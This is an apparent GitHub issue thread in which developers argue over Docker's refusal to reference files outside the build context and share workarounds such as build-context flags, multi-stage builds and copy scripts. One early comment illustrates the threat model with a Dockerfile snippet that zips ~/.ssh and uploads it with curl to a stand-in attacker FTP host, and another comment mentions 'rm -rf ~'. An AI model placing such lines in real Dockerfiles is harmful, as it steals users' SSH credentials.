Again, nothing new here. Just recapping what other new users like me have already pointed out. The only surprise from my standpoint is that this has been a confusing stumbling block for new users since 2013 and no action (not even an enhanced error message) has been taken to mitigate.

festus1973 picture festus1973  ·  9 Feb 2017
-3

@festus1973 I think the threat model here is that you download and run some project with a Dockerfile which will contain this:

ADD ~/.ssh /root/.ssh
RUN sh -c "zip ssh.zip /root/.ssh; curl -T ssh.zip ftp://hacker.me"

Sure, it's not a threat model for a mass-scale user, but it's absolutely possible for a more targeted attack.
The reason why it has not happened yet is cryptic. Do you always run untrusted code in a virtual machine?

Vanuan picture Vanuan  ·  9 Feb 2017
10

@Vanuan: I'm new to Docker and am totally unfamiliar with Linux commands (I'm on Windows) but if I understand you correctly, it looks like you're presenting a scenario wherein a dockerfile instructs the docker build engine to (1) copy a file or path containing private keys (or some other sensitive info) to a newly built docker container image and then (2) FTP the contents to a malevolent third party.

But how would I get that infected dockerfile into my build environment in the first place? Is the hacker going to email it to me? Let's say he does. Even if he did AND I were stupid enough to accept a file from a random party AND I decided I wanted to execute the contents of said random file, how would I do so? It's not like I can trigger a build simply by clicking on a dockerfile. It's nothing but a text file. A text file is far safer than a .js, .exe, or countless other filetypes that DO have default file handlers when clicked. No, I'd have to intentionally accept the file, not look at its contents, copy it to a dev environment, and manually run a build on it. That's rather contrived, no?

Seems to me you'd have to have sufficient permissions on the machine(s) housing the dockerfile and source-files in question, as well as the machine running the build. But if you have those permissions already (the ability to read the /.ssh folder, execute the build, etc.) then there are far more effective vectors of attack than attempting to sneak in a bad dockerfile.

I just don't see how this can be spun as a security issue. There may be other valid technical reasons for this 'context' design decision, but I'm just not buying the security angle.

As for whether or not I run untrusted code in a VM... Sure, if it's a throw-away VM not connected to the rest of my network. Otherwise, I use sensible security practices (e.g. not accepting dockerfiles from unknown parties and then attempting to feed them into a critical build process) and I rely on the OS file system security to do its job.

festus1973 picture festus1973  ·  9 Feb 2017
7

I'm with festus1973 in not getting what attack vector this is supposed to counteract. The fear is of instructions being added to the Dockerfile that expose the user's files in an image and potentially in a public repository. But if an attacker can insert such commands into my Dockerfile then apparently my machine is already compromised, and my user files can be siphoned off anyway.

But maybe exactly this scenario once played out not after an attack, but by user error and accident? For now the answer seems to be to do surgery on our projects to move exactly the files Docker depends on into a single subdirectory, but no others - a scenario which is likely to lead to people copy-pasting files, or moving files out of their natural context, or having to pass their entire project directory in to the daemon, or other unsavory things like that.

Maybe this would be better as a loud warning with a command-line flag to silence it?

johansen picture johansen  ·  10 Feb 2017
6

Basically, Docker is either trying to prevent people from doing something they really need (forcing hacky workarounds), or they think Linux file system security isn't good enough.

dessalines picture dessalines  ·  11 Feb 2017
-8

Please read back https://github.com/docker/docker/issues/2745#issuecomment-278505867 (and https://github.com/docker/docker/issues/2745#issuecomment-35335357). There is no "permission" check here. A Dockerfile cannot refer to files outside the passed build-context because those files are not there.

thaJeztah picture thaJeztah  ·  11 Feb 2017
1

@thaJeztah Good point. I think what's confusing to me is that there are two phases of "adding" a file. There's the file getting included in the build context by virtue of which directory is specified in the docker build command. And then there's the file getting added from the build context to the image via the ADD command in the Dockerfile.

Intuitively, I have always expected ADD to add a file both to the build context and to the image. If that's not how it works then that's fine, but it strikes me as potentially very helpful to have a command that does just that. ADD_TO_CONTEXT or something like that.

johansen picture johansen  ·  11 Feb 2017
1

Yes, basically docker build "bundles" the files, and sends them off to the daemon. The Dockerfile is the "script" to apply to those files.

We fully understand that being restricted to having all files in a single location can be limiting; the current "model" makes it very difficult to diverge from that. Things to consider are;

  • an option to provide multiple build contexts (docker build --context-add src=/some/path,target=/path/in/context --context-add src=/some/other/path,target=/some/other/path/in/context -f /path/to/Dockerfile)
  • parsing the Dockerfile client-side, then collect all that's requested, or use an rsync approach (daemon requesting files from the client). Allowing "arbitrary" paths in the Dockerfile would not work though, because you want the build to be "portable", "reproducible" (i.e., we don't want "it works on my machine, because my files happen to be in /home/foo/some/dir", but it breaks on _your_ machine, because they are located in /home/bar/some-other-dir)

So to keep them reproducible, you'd want to have a "context" in which the files can be found in a fixed location.

There's a lot of other improvements that can be made to the builder process, and I know there's people investigating different solutions, creating PoC's. I'm not up to speed on those designs, so it could be entirely different to my "quick" brain dump above :smile:

thaJeztah picture thaJeztah  ·  11 Feb 2017
0

Hi,

Here is how I solved it. Not sure whether it is considered a good practice.

Copy all artifacts in using a separate image and expose the volume.


COPY build/OpenAM-13.5.0.war /artifacts/openam.war
COPY build/configurator.jar /artifacts/configurator.jar
COPY build/opendj-3.5.1.zip /artifacts/opendj.zip
VOLUME /artifacts 
CMD ["echo", "done!"]

Then mount the artifacts volume on all dependent images. Here is what my docker-compose looks like:

version: "3"

volumes:
  djdata:
    driver: local
  artifacts:
    driver: local

networks:
  cyberinc:
    driver: bridge
    ipam:
      driver: default
      config:
        -
          subnet: 172.25.0.0/16

services:
  artifacts:
    build:
      context: artifacts/
    networks:
      cyberinc:
        ipv4_address: 172.25.3.10
    volumes:
      - artifacts:/artifacts
  opendj:
    build:
      context: docker-images/opendj
    networks:
      cyberinc:
        ipv4_address: 172.25.3.4
    ports:
      - "1389:1389"
    extra_hosts:
      - "opendj.${OPENDJ_DOMAIN}:127.0.0.1"
    volumes:
      - djdata:/opt/opendj
      - artifacts:/artifacts
    env_file:
      - ./.env
    depends_on:
      - artifacts
    command: ["start"]
sharmaudi picture sharmaudi  ·  26 Feb 2017
7

I used a similar approach, writing a PowerShell script to copy all necessary files to a docker-centric folder structure prior to running the build. It's becoming fairly clear that the whole 'context' bit was a fundamental design mistake that's extremely hard for developers to fix at this stage -- and is thus being spun as a "security issue."

festus1973 picture festus1973  ·  26 Feb 2017
36

Just stumbled upon this bug and I am dumbfounded how such a limitation still exists in 2017.

cen1 picture cen1  ·  9 Mar 2017
-13

@cen1 read back the discussion above; https://github.com/docker/docker/issues/2745#issuecomment-279093859, and https://github.com/docker/docker/issues/2745#issuecomment-279098321 give you the answers

thaJeztah picture thaJeztah  ·  9 Mar 2017
9

Me too, man. I eventually gave up on Docker. I'm not claiming that others haven't found viable uses for it. In fact, I know they have and I wish them the best. But from my perspective, everything I try to do with Docker dead-ends in some obscure bug or limitation. Even with seemingly simple tasks, Docker seems to fight me every step of the way. Some of the problems have solutions but they're undocumented and require a fair amount of hacking and trial-and-error to resolve, particularly if one is using Windows Server instead of Linux. I searched around and saw a lot of users, particularly Windows users, giving up in frustration so decided to follow their lead. Perhaps it'll be a more polished, viable solution for me a few years down the road but it's just not there yet.

festus1973 picture festus1973  ·  9 Mar 2017
6

+1 for the allow-parent-folders flag.

libasoles picture libasoles  ·  14 Mar 2017
37

Well, I have a workaround, even if I am not sure it will solve all use cases.
If you have a tree like this:

A
│   README.md 
└───B
│   │   myJson.json
│
└───C
    │   Dockerfile

and you need to access myJson.json from the Dockerfile, just write the Dockerfile as if you were in A:

FROM my_image
ADD ./B/myJson.json .

And then launch docker specifying the path to the Dockerfile:

docker build -f ./C/Dockerfile  .

That way, it works for me.

Moreover if you use docker compose, you can also do (assuming your docker-compose.yml is in A):

version: '3'
services:
  my_service:
    build:
      context: ./
      dockerfile: ./C/Dockerfile
Romathonat picture Romathonat  ·  29 Mar 2017
0

@Romathonat I can't do that, as docker by default adds everything in the parent directory, which is like 500MB in some of those subfolders for me.

dessalines picture dessalines  ·  29 Mar 2017
0

@dessalines well, maybe the dockerignore could help?

Romathonat picture Romathonat  ·  30 Mar 2017
-7

@Romathonat it doesn't unfortunately. You could add every directory to the dockerignore and it would be just as big. It unavoidably adds everything in the parent directory. Docker states in its official docs that the Dockerfile should be in its own empty directory, ... but then disables relative pathing.

dessalines picture dessalines  ·  30 Mar 2017
0

Thought I had a good project folder.

Found out symlinks and relative pathing don't work.

This appears to be just an issue about where to source the files from, so it looks like we have to create two docker files.

FROM scratch
ADD . /app
FROM scratch-image
ADD ./subfolder /app/subfolder

which is depressing

disarticulate picture disarticulate  ·  29 Apr 2017
18

Sad.

minexew picture minexew  ·  5 May 2017
7

So much for running a microservice architecture with multiple repositories and Dockerfiles. :/ Please reopen.

Edit: As a workaround, I created a parent repository and added my other repos as git submodules. I feel like it's a hacky solution though.

zerefel picture zerefel  ·  11 Jun 2017
7

This is something that baffles me also. I just ran into this limitation, and I can't see any reason for it. To say this is a security issue due to malicious people placing bad lines in their Dockerfile and then telling people to clone, build, and publish the image is flimsy reasoning. If I pull a Dockerfile from the Internet (github or whatever) and blindly follow orders without looking at the file to create an image that I subsequently blindly and naively publish to a public repository, I will reap what I deserve. To limit the product for that edge case is specious logic at best.

I am using (and highly recommend if possible) the workaround proposed by @Romathonat which actually works in my case, because I can have central config isolated in its own parent directory, but it's easy to see how that case might not work for everyone.

But, at the core, it's frustrating to see so many people speaking out with user experiences just to get shut down without a fair hearing.

(Added: I'll just leave this here from Moby's README.md):

Usable security: Moby will provide secure defaults without compromising usability.
kitsuneninetails picture kitsuneninetails  ·  30 Jun 2017
12

+1. There is no reason not to make this possible.

morremeyer picture morremeyer  ·  30 Jun 2017
3

@kitsuneninetails - you hit the nail on the head. I would like to use Docker, but this issue is a show-stopper for me and, I suspect, for many others. I take responsibility for what software I choose to remotely include as part of my own, and I don't need or want authoritative hobbling of what I can do with software, which effectively takes away my responsibility with the lame excuse/insult that I (and the larger group of my peers) am irresponsible. I build my own images from the ground up anyway, so that "security" issue does not apply in my case. If they want to continue with this foolishness, they do it at their peril, because there are competitors nipping at their heels. I'm just doing my research on https://www.packer.io/intro/why.html - I haven't yet fully understood whether it is the replacement I'm looking for, but I suspect it will be the docker killer.

ReinsBrain picture ReinsBrain  ·  1 Jul 2017
-10

@mauricemeyer @kitsuneninetails @ReinsBrain As has already been mentioned numerous times, it's not purely a security issue. Docker has a client-server architecture. The Docker builder is currently implemented on the server side. So if you want to use files outside the build context, you'd have to copy those files to the docker server.

One thing docker newbies don't realize is that you can keep the Dockerfile separate from the build context. I.e. if you have root/proj1/build/Dockerfile, root/proj2/build/Dockerfile, root/common/somecommonfile you can still set the build context to root. But the next thing you'll complain about is that the build would take prohibitively long, as you now have to copy the whole root directory to the machine where the docker server resides.
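
For example, something along these lines (directory names are from the layout above; the tags are just placeholders):

# run from inside "root", which becomes the build context
docker build -f proj1/build/Dockerfile -t proj1 .
docker build -f proj2/build/Dockerfile -t proj2 .
# inside those Dockerfiles, COPY/ADD paths are then relative to "root",
# e.g. COPY common/somecommonfile /somewhere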

Vanuan picture Vanuan  ·  2 Jul 2017
0

@ReinsBrain Regarding a security issue consider this:

You're a docker hosting provider (or CI) and allow people to upload their private git repositories with Dockerfiles. Since you want to be as efficient as possible, you implement your service with docker containers. If you allow people to reference any files on your server you'd risk that people would be able to steal private code from each other. How would you solve this?

Vanuan picture Vanuan  ·  2 Jul 2017
0

@ReinsBrain Packer is not a competitor currently. It's a tool to build VM images. Though I can imagine packer to be able to build container images at some point.

Vanuan picture Vanuan  ·  2 Jul 2017
0

@dessalines Why aren't you satisfied with my comment? Doesn't it sound reasonable? Do you have any questions remaining? Do you have a solution to the problem I described?

Vanuan picture Vanuan  ·  2 Jul 2017
3

@Vanuan :

If you allow people to reference any files on your server you'd risk that people would be able to steal private code from each other. How would you solve this?

You run people's dockers inside their own (isolated) containers.

ReinsBrain picture ReinsBrain  ·  2 Jul 2017
0

You run people's dockers inside their own (isolated) containers.

Sorry, I don't understand what "dockers" means here. Do you mean Docker in Docker?

Vanuan picture Vanuan  ·  2 Jul 2017
1

I suppose it could be a Docker in Docker but there are many options for virtualization depending on your platform.

ReinsBrain picture ReinsBrain  ·  3 Jul 2017
1

@Vanuan

"So if you want to use files outside the build context you'd have to copy those files to the docker server."

So, can that not be done automatically? If I specify a file out of the context, is it not possible and/or feasible to automatically copy it to the server in order to build it into the image?

"One things docker newbies don't realize is that you can keep Dockerfile separate from build context."

So, the unfortunate haughty attitude to your "newbie" users aside, this is actually what has already been suggested (by @Romathonat above), and as I stated in my own post, this is the solution I am currently using. This works for me. However, if I had multiple, shared config, and my individual docker images were rather big, this would get fairly prohibitive, as it has been stated by others that each docker image would contain the files for every other docker image, even though it would never need them. I could easily see why people would be frustrated by what they could easily see as stonewalling in refusing to work with users' requests and needs and implement this feature.

"You're a docker hosting provider (or CI) and allow people to upload their private git repositories with Dockerfiles."

If I understand this correctly, it seems like this is a case where someone is intentionally setting up a situation just to create this problem. Wouldn't this mean that people are uploading not just Dockerfiles, but actual private information to this central server? Private information a malicious Dockerfile could then supposedly read and include into its own image via an "ADD" command? Because if I can just ADD someone else's Dockerfile, it doesn't seem like a catastrophic issue (although definitely still a security breach), but how would the system be able to "read" that other file in the first place? Is everyone acting under the same user in this CI system (which seems like a major security breach right there)?

It seems like this is a problem the creator of this service should be solving with virtualization, security "jails", system access security, etc., rather than force the other 99.9% of docker users into a strict system just to prevent this one sysadmin from blowing their own toes off.

Secondly, there are many ways for a sysadmin to get around this problem. First off, system access control (if my user has access and/or permissions to a set of files, I can include them; otherwise, I get a read-access error, etc.), virtualization via VMs, etc., or other tactics (such as not allowing people to upload private information which can then be downloaded by other users via malicious Dockerfiles in the first place). This seems more of an operational/systems problem to me, not a job for a particular tool to be enforcing a strict paradigm just to save greenhorn sysadmins from making security miscues.

kitsuneninetails picture kitsuneninetails  ·  3 Jul 2017
0

I could easily see why people would be frustrated by what they could easily see as stonewalling in refusing to work with users' requests and needs and implement this feature.

Can't you just as easily see why maintainers would be frustrated?

If I understand this correctly, it seems like this is a case where someone is intentionally setting up a situation just to create this problem.

If you read the docker history, you'd know that this whole "docker" concept was developed in-house (in "dotCloud" then) as a tool to efficiently use server resources. No, it's not "setting up a situation". It's a historic fact.

Wouldn't this mean that people are uploading not just Dockerfiles, but actual private information to this central server

Sure. Just like in any "as-a-service".

Is everyone acting under the same user in this CI system (which seems like a major security breach right there)?

There would be only one docker daemon, so yes. Otherwise you'd need to set up a separate docker daemon for each user, which is impossible on one host (it would require an actual virtual machine for each user, rendering containers and docker meaningless for that use case).

It is not a security concern for running containers (since kernel isolates them), but it is a security concern when there are no containers yet (when you're building images).

First off, system access control

You're still talking as if each user runs a separate process. It's a server, remember? There's only one user and one filesystem. That would require implementing an application layer of access control on top of the system one.

This seems more of an operational/systems problem to me, not a job for a particular tool to be enforcing a strict paradigm just to save greenhorn sysadmins from making security miscues

You're not forced to use docker to build images. The container image format is currently being standardized, so there are other tools you can build images with. Once the image is built, push it to an image registry so that docker can pull it.

And I'm sure that when the build tool is extracted out of the server monolith (#32925), the relative-path use case will become possible, as the builder would run in a separate process under a "normal" user.

Vanuan picture Vanuan  ·  3 Jul 2017
2

I'm running into this issue as well in a Go project. Here's how this became a problem for me:

I want to run a container for developing my server locally, which has the following approximate structure:

MyOrg 
└───Dependency
│   │   dep.go
│
└───Main
    │   main.go
    │   depends-on-dep.go
    │   Dockerfile

Inside of my Dockerfile, there are two options I can think of here:

  1. ADD ../ /go/src/MyOrg
  2. Only add the main package and then install the dependencies from the repo

The first option doesn't work because of this bug.
The second option is not only awful, but doesn't work because of moby#6396 (another multi-year-old unsolved issue), and MyOrg happens to be bristling with private repos.

My only other option is to put all the dependencies into the vendor folder

MyOrg 
└───Dependency
│   │   dep.go
│
└───Main
    │   main.go
    │   depends-on-dep.go
    │   Dockerfile
    └───vendor
        └───Dependency
            │   dep.go

Now if I ever want to update Dependency/dep.go I have to run a script to manually copy the Dependency folder into the vendor folder. Just bizarre.

Or alternatively as @Romathonat kindly pointed out, I can enter cd $GOPATH/src and run the command $ docker build -f ./MyOrg/Main/Dockerfile -t MyProj . so now my container is a nice husky ~300mb due to how much is in $GOPATH/src.

warent picture warent  ·  9 Jul 2017
3

Wouldn't it be trivial for Docker to do quick static analysis and detect whether a relative parent directory is being accessed? Then when you try to run or build it, it would abort saying This Dockerfile dangerously accesses parent directories. After making sure you understand the security implications, please run again with the flag --dangerouslyAllowParentDirectories and then add those relative directories to the build context

warent picture warent  ·  9 Jul 2017
0

@warent It looks like you want to link statically with some library?
For production image, I see 3 solutions:

1) Treat it as a thirdparty library with its own release cycle

  • Publish Dependency using go package manager
  • In Dockerfile fetch all dependencies using go package manager

2) Treat it as a part of your application with synchronous release cycle

  • Move Dependency to Main
  • Add additional Dockerfile if you want to release Dependency separately

3) Move Dockerfile to MyOrg

For development image there's a 4th solution:

4) Just use docker-compose

  • use image with Go build tools
  • mount MyOrg to /src
  • use go command to build normally as you would without docker
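
For the 4th option, roughly something like this might work (the Go image tag and paths here are just assumptions):

# run from inside the MyOrg directory
docker run --rm \
  -v "$PWD":/go/src/MyOrg \
  -w /go/src/MyOrg/Main \
  golang:1.8 \
  go build -o main .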
Vanuan picture Vanuan  ·  10 Jul 2017
3

Your #2 is a non-solution if the Dependency is used by more than one MyOrg project, which, if I understand correctly, is the entire point of @warent's setup.

#3 also breaks once there is more than one top-level project.

That really leaves us with just solution #1, which is a lot of hassle for something that should be a non-issue.

Virtually every build system on the planet supports this setup (e.g. CMake's add_subdirectory actually lets you ascend into the parent directory, etc.); Docker is the special needs child here :)

minexew picture minexew  ·  10 Jul 2017
0

a lot of hassle for something that should be a non-issue.

Dependency management is always an issue. Often there's a temptation to dump everything into one repository (like they do at Facebook and Google), but it's not an option in the open source community. And when you have multiple repositories you must either use git clone or some other package source.

every build system on the planet supports this setup

The thing is, docker is not a build system. It's not designed as a build tool. Build functionality is there only out of necessity, and it has very limited capabilities. You can't use multiple Dockerfiles to build one image (without an intermediate registry step), you can't import a Dockerfile (you can only use another image as a base), and there were no multi-stage builds until recently. It's not a replacement for CMake.

So yeah, if you need a build tool, use CMake (or docker-compose run) and then just add artifacts to the result image.

Vanuan picture Vanuan  ·  10 Jul 2017
7

So why can't we do this? A tool should not be enforcing its own ideology onto its users when it's designed to be as versatile as possible.

davidawad picture davidawad  ·  28 Jul 2017
0

+1.

Basically I have a JAR file for instrumentation that needs to be in every single micro-service, but it is quite large. Due to a change in infrastructure (Rancher for orchestration instead of ad-hoc docker scripts) it will no longer be "easy" for me to mount the instrumentation JAR in the target container at runtime, so I need to supply it to the Dockerfile and copy it into the container at build time.

Well, the JAR is quite big, so it lives in the parent directory of all the micro-service directories (each containing its own Dockerfile).

Due to this "limitation" I am forced to copy/clone a 50MB+ JAR into every single micro-service (10+) directory... Not healthy for my co-workers' machines or the Git repository.

Providing a flag such as --include-context="/path/to/file.ext" to docker build would not be outside of the realm of possibility. The Dockerfile would have to be pre-processed before bundling the context to analyse dependencies from outer directories which would then be added to the context bundle, right?

In my mind this does not look like a very far-fetched feature-request - but rather quite sensible usage.

For those that want a hotfix for now:
Wrap the docker build command in a script which copies all dependencies to the build directory and deletes them afterwards. Ugly and inefficient, yet reasonable...

cp ../docker-files/instrumentation.jar instrumentation.jar
docker build -t service-name .
rm instrumentation.jar

Cheers
Dan

metabrain picture metabrain  ·  2 Aug 2017
0

Just FYI to anyone here, the best solution I have found so far was to simply copy the Dockerfile to the root of the project and give the filename a uuid. After building, just delete the uuid Dockerfile. Worst case, the Dockerfile doesn't get deleted, but it's a uuid, so it shouldn't really matter.

I tried symlinks up the wazoo; they did not work. Copying the file to the root of the project with a uuid isn't as pretty as symlinks, but it does work.
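
For reference, a rough sketch of that trick (the source path and image tag are made up):

uuid=$(uuidgen)
cp docker/Dockerfile "./Dockerfile.$uuid"          # copy the Dockerfile to the project root
docker build -f "./Dockerfile.$uuid" -t my-image .
rm -f "./Dockerfile.$uuid"                         # worst case this never runs, which is harmless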

ORESoftware picture ORESoftware  ·  3 Aug 2017
1

You can just build the Docker context directly:

# Tar the current directory, then change to another directory and add it to the tar
tar -c ./* -C $SOME_OTHER_DIRECTORY some_files_from_other_directory | docker build -

This is basically what https://github.com/six8/dockerfactory does

six8 picture six8  ·  3 Aug 2017
0

Basically I have a JAR file for instrumentation that needs to be in every single micro-service, but is quite large. Due to change in infrastructure (Rancher for orchestration instead of ad-hoc docker scripts) it will no longer be "easy" for me to mount the JAR for instrumentation in the target container at runtime, so I need to supply it to Dockerfile and copy it inside the container at build time.

If this JAR file is static you shouldn't include it in your git repository. Here's a proper way:

  1. Build a base image (e.g. custom-java) with JAR file included
  2. Create a Jenkins (or other CI) pipeline where you build and push the custom-java image to the registry
  3. On each microservice's Dockerfile use base JAR image: FROM my-registry/custom-java

Alternatively, you could just put the JAR file to some http server and use this in your Dockerfile:

ADD http://my-server/custom.jar /path/to/custom.jar

Vanuan picture Vanuan  ·  3 Aug 2017
3

You can use multi-stage builds;

Create a Docker image for your packages (or build several of such images)

Dockerfile.packages:

FROM scratch
COPY instrumentation.jar /

Build it;

docker build -t my-packages:v1.0.1 -f Dockerfile.packages .

Now, every image that needs these packages can include them as a build-stage. This gives the advantage over a "base image" that you can "mix and match" what you need;

FROM my-packages:v1.0.1 AS packages

FROM nginx:alpine
COPY --from=packages /instrumentation.jar /some/path/instrumentation.jar

Another image that also wants this package, but uses a different base-image;

FROM my-packages:v1.0.1 AS packages

FROM mysql
COPY --from=packages /instrumentation.jar /some/path/instrumentation.jar

Or several of your "package" images

FROM my-packages:v1.0.1 AS packages
FROM my-other-packages:v3.2.1 AS other-packages

FROM my-base-image
COPY --from=packages /instrumentation.jar /some/path/instrumentation.jar
COPY --from=other-packages /foobar-baz.tgz /some/other-path/foobar-baz.tgz
thaJeztah picture thaJeztah  ·  3 Aug 2017
1

I tried symlinks up the wazooo, did not work. Copying the file to the root of the project the uuid isn't as pretty as symlinks, but it does work.

@ORESoftware The trick I've used in the past is to use symlinks and then rsync everything with symlink resolution to a separate folder for building. It doesn't really work if you have really large files in your build, but for most use cases it's a workaround that can get the job done.
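
Something like this, assuming the symlinks inside the project point at the shared code (all names here are made up):

rsync -a --copy-links ./ /tmp/docker-staging/    # resolve symlinks into real files in a staging dir
docker build -t my-image /tmp/docker-staging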

daveisfera picture daveisfera  ·  3 Aug 2017
6

+1. This looks like a very basic and useful feature. Sharing code/library between containers is a challenging task, and this limitation makes it worse.

rulai-huajunzeng picture rulai-huajunzeng  ·  3 Aug 2017
0

@daveisfera thanks, I will look into that...I have to support generic building of projects for the purposes of library code, so the stupid trick of copying the Dockerfile to the root of the project is the only lightweight thing I can think of, where the only thing being copied is the Dockerfile itself. Seems dumb but works lol.

In the docker container, I have to copy all the project's files to the container, but if the dependencies haven't changed then those don't need to get copied or installed. So the best case shortest path is the time it takes to copy the project files. I am totally open to better ways of doing this but rsync is probably too heavy-handed for my use case.

ORESoftware picture ORESoftware  ·  4 Aug 2017
21

This is extremely unfortunate. At this point, it's physically impossible for me to add any new ideas, since all of them have already been brought up. But for some reason, the Docker people seem to keep complaining about security aspects.

This makes less than zero sense: just add an --enable-unsafe-parent-directory-includes flag, which is disabled by default. Boom: everyone is happy. Can we stop pretending that security is a concern here?

If the attack vector is that an attacker somehow convinced me to run docker build --enable-unsafe-parent-directory-includes on their Dockerfile, then I think I'm stupid enough that they also could have convinced me to run rm -rf ~.

raxod502 picture raxod502  ·  9 Aug 2017
0

If the attack vector is that an attacker somehow convinced me to run docker build --enable-unsafe-parent-directory-includes on their Dockerfile, then I think I'm stupid enough that they also could have convinced me to run rm -rf ~.

I think you're missing one important difference: docker runs in a superuser context.
And no, you don't have to be stupid to be convinced to clone some project from GitHub and run docker-compose up.

And yes, I also think security isn't the main issue here.

Vanuan picture Vanuan  ·  11 Aug 2017
0

LXDock is interesting: https://lxdock.readthedocs.io/en/stable/provisioners/index.html#provisioners
Note the warning - duly noted and highly appreciated :)

ReinsBrain picture ReinsBrain  ·  20 Aug 2017
2

5 years later and docker still issues this cryptic error message that rivals ones from nuget.

How about at least putting in "Even though you are in path X when you issued the docker command, and your dockerfile has a path relative to X, and you have specified a working directory in the dockerfile, docker is going to be working in path Y (ps. u r stupid noob)"

At least I think that's the obstacle preventing me from completing a basic walkthrough. This tech seems great and all, but I shouldn't need to spend a few weeks researching the ins and outs and dealing with 5-year-old bugs like this just to try it.

StingyJack picture StingyJack  ·  3 Nov 2017
0

This appears to still be a bug; at least it is presenting itself today in what feels like a very routine use-case.

jonbronson picture jonbronson  ·  14 Nov 2017
0

It certainly feels like one at first. But not after you learn how to mount your source and build directories, which is the recommended approach for development. You aren't supposed to rebuild your images on every source change.

When you're comfortable with the development use case, you can proceed to the production use case, at which point you create a Dockerfile-production and use the context to point the docker builder at the root of your project.

Then you realize that not all the files in your project are required for production. You begin to optimize by creating a build image and using the build-artifacts folder as the context for your production build. Then you learn about multi-stage builds, at which point you're comfortable with the setup you have.

If you need to put something else from your HOME folder in your image, like your private ssh keys (not the brightest idea), you can copy them to your project dir (surely you're not worried about security) or even commit them to git.

Vanuan picture Vanuan  ·  15 Nov 2017
0

I just ran into this issue as well.

Is there a reasonable workaround? I just want to mount a folder that is not in the docker folder...

grrava picture grrava  ·  22 Nov 2017
0

All this "mount" talk and "Home folders". If anyone is going to fix the error to be more clear, please remember that some of us have C: drives and %USERPROFILE%.

StingyJack picture StingyJack  ·  22 Nov 2017
0

The way it works on Windows is via network shares, which is a kind of mount.

Vanuan picture Vanuan  ·  23 Nov 2017
0

Windows has actually had mounting for a long time; it's just transparent to users, unlike *nix. I just didn't want to be further confused by *nix-specific messages while trying Docker out on Windows.

Why would I create a network share to run a docker image on the host running on my local machine? That seems "extra", but if the error message said that was the problem I would fix it and not come bothering anyone.

StingyJack picture StingyJack  ·  23 Nov 2017
0

If you're talking about Docker on Windows, it still uses linux in a VM.

Vanuan picture Vanuan  ·  23 Nov 2017
0

When you run docker build it actually zips up your src folder and transfers it to the docker server, which executes the commands from your Dockerfile.

Vanuan picture Vanuan  ·  23 Nov 2017
3

It looks like there are some people who want to reference any files from the Dockerfile. But Dockerfile parsing is done on the docker server. So there's no way it could know which files are referenced.

There are some local image builders, but you have to install them yourself. Plus, they'll probably still need to run in the VM. And you still have to push the images you build to the docker server.

Some people are asking to change message from "Forbidden path" to something more understandable.
Does the message "You can't reference files outside the build context" make more sense to you?

Vanuan picture Vanuan  ·  23 Nov 2017
0

When you run docker build it actually zips up your src folder and transfers it to the docker server, which executes the commands from your Dockerfile.

So if I have a dockerfile like this...

FROM microsoft/aspnet:4.7
ARG source
WORKDIR /inetpub/wwwroot
COPY ${source:-obj/Docker/publish} .

... and run a command to publish a new empty Asp.net (not core) web app (dockerfile inside folder) ...
PS C:\WINDOWS\system32> docker build C:\Users\astanton\source\repos\WebApplication3

... the COPY failed error that crops up (that talks about a path I have specified nowhere) is talking about it from the context of the "Docker Server" box in the picture above?

COPY failed: GetFileAttributesEx \\?\C:\WINDOWS\TEMP\docker-builder951625405\obj\Docker\publish: The system cannot find the file specified.

I did try changing the COPY to various relative and absolute paths, but nothing stopped producing that error, or caused a different one to happen.

I'm only on this thread as it's the only place I could find that mentions the random temp docker-builderNNNNNNNN folder that does get created locally on my Windows PC (maybe on the Docker Server as well, but I can't tell). The local folder is removed almost immediately. If what I'm describing isn't the same issue as this very long and meandering thread, please say so and I'll open a new issue.

Does the message "You can't reference files outside the build context" make more sense to you?

No, because of two things

  • despite the name of the command I am executing, I'm not compiling anything. I'm deploying something already built to a container to create an image.
  • It doesn't tell me what the build context _is_. "Build context" is meaningless without some concrete bit of info, like the context's path or environment variable or the referenced file paths.
StingyJack picture StingyJack  ·  27 Nov 2017
2

I'm not compiling anything

Well, you're compiling an image. Even though you have already "built" a thing you want to put into an image, you have not built an image.

It doesnt tell me what the build context is.

Well, error messages should not replace documentation.

Vanuan picture Vanuan  ·  27 Nov 2017
0
FROM microsoft/aspnet:4.7
ARG source
WORKDIR /inetpub/wwwroot
COPY ${source:-obj/Docker/publish} .
PS C:\WINDOWS\system32> docker build C:\Users\astanton\source\repos\WebApplication3
COPY failed: GetFileAttributesEx \\?\C:\WINDOWS\TEMP\docker-builder951625405\obj\Docker\publish: The system cannot find the file specified.

I see what you're trying to do. It looks like you have neither read the Dockerfile reference nor docker build help.

  1. You have ARG source specified but you haven't provided a value for it, so the default value of obj/Docker/publish kicks in
  2. The first argument of the docker build command is the build context. You would know what a build context is if you had read how to use docker build before running this command.
  3. The error essentially tells you that there's no obj\Docker\publish in C:\Users\astanton\source\repos\WebApplication3\.
Vanuan picture Vanuan  ·  27 Nov 2017
0

Also, it looks like you're running Windows containers (native docker server), which do not require a VM.
This technology is still experimental, so you may be experiencing a bug.

Vanuan picture Vanuan  ·  27 Nov 2017
6

+1 for allowing something like 'COPY ../../src'

I'm sorry, but any environment that pushes developers to use such clumsy project structures will never mature and leave the mickey-mouse stage. This is not how successful products evolve, and no PR hype can be a savior for long.

Docker team, please propose some viable solution.

accetto picture accetto  ·  30 Dec 2017
0

It looks like you have neither read the Dockerfile reference nor docker build help.

@vanuan - I should not need to digest tomes of information just to "get started". I already had to get permission to temporarily uninstall antivirus that was interfering with docker.

The paths used in the build context shouldn't be somewhere other than where I'm executing the command or the program folders. A common temp location is ok too, but _only if it doesn't require additional permissions_, which I think is what you are saying this needs.

StingyJack picture StingyJack  ·  31 Dec 2017
2

Super clean and direct and works fine, at least for me:
https://www.jamestharpe.com/include-files-outside-docker-build-context/

vilas27 picture vilas27  ·  3 Jan 2018
2

@vilas27 Yes, this tutorial describes how to set a context directory.

Which implies that the problem here is that docker build --help is not descriptive enough:

docker build --help

Usage:  docker build [OPTIONS] PATH | URL | -

Build an image from a Dockerfile

People should refer to extended description on the website:

https://docs.docker.com/engine/reference/commandline/build/

The docker build command builds Docker images from a Dockerfile and a “context”. A build’s context is the set of files located in the specified PATH or URL. The build process can refer to any of the files in the context. For example, your build can use a COPY instruction to reference a file in the context.

The URL parameter can refer to three kinds of resources: Git repositories, pre-packaged tarball contexts and plain text files.

Having read that, it's quite easy to grasp what "Forbidden path" really means. It doesn't have anything to do with permissions.

@StingyJack

I should not need to digest tomes of information just to "get started".

